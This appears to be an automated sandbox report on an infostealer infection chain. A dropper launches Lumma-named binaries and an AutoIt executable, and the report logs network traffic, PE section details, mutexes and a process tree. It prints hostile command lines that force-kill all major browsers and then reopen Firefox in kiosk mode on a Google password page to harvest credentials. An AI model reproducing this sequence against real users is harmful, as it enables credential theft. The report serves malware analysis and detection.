Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49892 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49986 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50030 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 67baab2438.exe, 0000000B.00000000.2685000427.0000000000102000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e03090a1-8
Source: 67baab2438.exe, 0000000B.00000000.2685000427.0000000000102000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_352a6fde-3
Source: 67baab2438.exe, 0000001E.00000000.2813742419.0000000000102000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_ed3a4e4a-6
Source: 67baab2438.exe, 0000001E.00000000.2813742419.0000000000102000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4fe0b25e-f
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: 3f81b82714.exe.5.dr Static PE information: section name:
Source: 3f81b82714.exe.5.dr Static PE information: section name: .idata
Source: Lumma55[1].exe.5.dr Static PE information: section name:
Source: Lumma55[1].exe.5.dr Static PE information: section name: .idata
Source: Lumma55[1].exe.5.dr Static PE information: section name:
Source: Lumma55.exe.5.dr Static PE information: section name:
Source: Lumma55.exe.5.dr Static PE information: section name: .idata
Source: Lumma55.exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: .rsrc
Source: random[2].exe.5.dr Static PE information: section name: .idata
Source: random[2].exe.5.dr Static PE information: section name:
Source: d199ee6df3.exe.5.dr Static PE information: section name:
Source: d199ee6df3.exe.5.dr Static PE information: section name: .rsrc
Source: d199ee6df3.exe.5.dr Static PE information: section name: .idata
Source: d199ee6df3.exe.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: 8e3ce0163b.exe.5.dr Static PE information: section name:
Source: 8e3ce0163b.exe.5.dr Static PE information: section name: .idata
Source: 8e3ce0163b.exe.5.dr Static PE information: section name:
Source: random[1].exe1.5.dr Static PE information: section name:
Source: random[1].exe1.5.dr Static PE information: section name: .idata
Source: random[1].exe1.5.dr Static PE information: section name:
Source: 80c14d0add.exe.5.dr Static PE information: section name:
Source: 80c14d0add.exe.5.dr Static PE information: section name: .idata
Source: 80c14d0add.exe.5.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_00870661 10_3_00870661
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008DC000 10_3_008DC000
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008DC000 10_3_008DC000
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E67D1 10_3_008E67D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E87D1 10_3_008E87D1
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008DC000 10_3_008DC000
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9981692779291553
Source: file.exe Static PE information: Section: wajwbeif ZLIB complexity 0.99475678243528
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981692779291553
Source: skotes.exe.0.dr Static PE information: Section: wajwbeif ZLIB complexity 0.99475678243528
Source: Lumma55[1].exe.5.dr Static PE information: Section: ZLIB complexity 0.9991995389344263
Source: Lumma55[1].exe.5.dr Static PE information: Section: jobzmdtd ZLIB complexity 0.9945954464550578
Source: Lumma55.exe.5.dr Static PE information: Section: ZLIB complexity 0.9991995389344263
Source: Lumma55.exe.5.dr Static PE information: Section: jobzmdtd ZLIB complexity 0.9945954464550578
Source: random[2].exe.5.dr Static PE information: Section: xkihckyz ZLIB complexity 0.994251711056876
Source: d199ee6df3.exe.5.dr Static PE information: Section: xkihckyz ZLIB complexity 0.994251711056876
Source: random[1].exe0.5.dr Static PE information: Section: ZLIB complexity 0.9993148053278689
Source: random[1].exe0.5.dr Static PE information: Section: kdrhrxjp ZLIB complexity 0.9943424303683738
Source: 8e3ce0163b.exe.5.dr Static PE information: Section: ZLIB complexity 0.9993148053278689
Source: 8e3ce0163b.exe.5.dr Static PE information: Section: kdrhrxjp ZLIB complexity 0.9943424303683738
Source: random[1].exe1.5.dr Static PE information: Section: ojfapqbx ZLIB complexity 0.9949533620240928
Source: 80c14d0add.exe.5.dr Static PE information: Section: ojfapqbx ZLIB complexity 0.9949533620240928
Source: random[1].exe.5.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 3f81b82714.exe.5.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@49/21@68/11
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Lumma55[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Lumma55.exe, 00000006.00000003.2504132601.0000000005730000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2588264834.0000000005A45000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2724220454.00000000054C5000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722584407.00000000054F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Lumma55.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 80c14d0add.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8e3ce0163b.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe "C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe "C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe "C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe "C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe "C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe"
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe "C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2252 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {764fe40d-22ed-4bc9-8bbf-cf1b54f9bef0} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" 1de7406db10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 3956 -prefMapHandle 3960 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c30cc886-e8f0-49cd-833d-6f1412d347ff} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" 1de04753b10 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe "C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe "C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe"
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe "C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe "C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe "C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe "C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe "C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe" Jump to behavior
